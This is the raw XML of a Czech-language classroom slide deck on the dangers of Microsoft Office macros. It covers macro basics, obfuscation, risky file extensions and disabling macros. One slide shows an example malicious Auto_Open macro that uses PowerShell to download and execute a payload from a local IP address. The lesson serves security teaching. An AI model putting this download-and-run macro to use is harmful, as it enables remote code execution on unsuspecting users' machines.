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2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BC85AE7-077D-4F8A-A531-7EB5D862D30A}" type="datetimeFigureOut">
              <a:rPr lang="cs-CZ" smtClean="0"/>
              <a:t>26.9.2017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D5F06A-C98C-42CB-A94E-8C6DA9E1159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t>26.9.2017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t>26.9.2017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t>26.9.2017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t>26.9.2017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t>26.9.2017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C85AE7-077D-4F8A-A531-7EB5D862D30A}" type="datetimeFigureOut">
              <a:rPr lang="cs-CZ" smtClean="0"/>
              <a:t>26.9.2017</a:t>
            </a:fld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D5F06A-C98C-42CB-A94E-8C6DA9E1159E}" type="slidenum">
              <a:rPr lang="cs-CZ" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ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BC85AE7-077D-4F8A-A531-7EB5D862D30A}" type="datetimeFigureOut">
              <a:rPr lang="cs-CZ" smtClean="0"/>
              <a:t>26.9.2017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D5F06A-C98C-42CB-A94E-8C6DA9E1159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t>26.9.2017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t>26.9.2017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t>26.9.2017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BC85AE7-077D-4F8A-A531-7EB5D862D30A}" type="datetimeFigureOut">
              <a:rPr lang="cs-CZ" smtClean="0"/>
              <a:t>26.9.2017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D5F06A-C98C-42CB-A94E-8C6DA9E1159E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Nebezpečí skryté v dokumentech Microsoft Office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Osnova hodiny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Diskuse o souvislostech  s dříve probranou látkou</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Co to jsou makra? A jak je psát? (+ ukázka)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>V jakých souborech se mohou skrývat?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Správné nastavení úrovně bezpečnosti MS Office </a:t>
            </a:r>
          </a:p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9725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Pojmy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Makro/makra</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Visual Basic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Obfuskace</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Výpočetně úplný / turingovsky kompletní</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="203231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jsou to makra?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Způsob jak programovat dodatečnou funkcionalitu do dokumentů nástrojové sady Microsoft office.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Programy v jazyce Visual Basic.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Potenciální bezpečnostní slabina.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4493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636912"/>
            <a:ext cx="8435280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 škodlivého makra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Auto_Open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Dim exec As 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 = "powershell.exe ""IEX ((new-object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net.webclient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downloadstring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('http://10.0.0.13/payload.txt '))"""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Shell (exec)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9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Rizikové soubory MS Office dle přípony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Soubory které mohou obsahovat makra:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>.doc, .dot, .docx, .dotx, .docm, .dotm, .xls, .xlt, .xlm*, .xlsx, .xltx, .xlsm, .xltm, .xla, .xlam, .xll, .ppt, .pot, .pptx, .potx, .ppsx, .sldx, .pptm, .potm, .ppsm, .sldm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Obrana:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Otevřít nový dokument, např. MS Word</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Nastavení &gt; Centrum bezpečnosti &gt; Nastavení centra bezpečnosti &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" smtClean="0"/>
              <a:t>Vypnout všechna makra bez oznámení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501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istický">
  <a:themeElements>
    <a:clrScheme name="Urbanistic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istic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ist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154</TotalTime>
  <Words>197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Georgia</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Urbanistický</vt:lpstr>
      <vt:lpstr>Nebezpečí skryté v dokumentech Microsoft Office</vt:lpstr>
      <vt:lpstr>Osnova hodiny</vt:lpstr>
      <vt:lpstr>Pojmy</vt:lpstr>
      <vt:lpstr>Co jsou to makra?</vt:lpstr>
      <vt:lpstr>Ukázka škodlivého makra</vt:lpstr>
      <vt:lpstr>Rizikové soubory MS Office dle přípony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Krádež Identity</dc:title>
  <dc:creator>-</dc:creator>
  <cp:lastModifiedBy>Daniel Dusek</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-09-25T20:36:50Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-09-26T10:02:11Z</dcterms:modified>
</cp:coreProperties>
</file>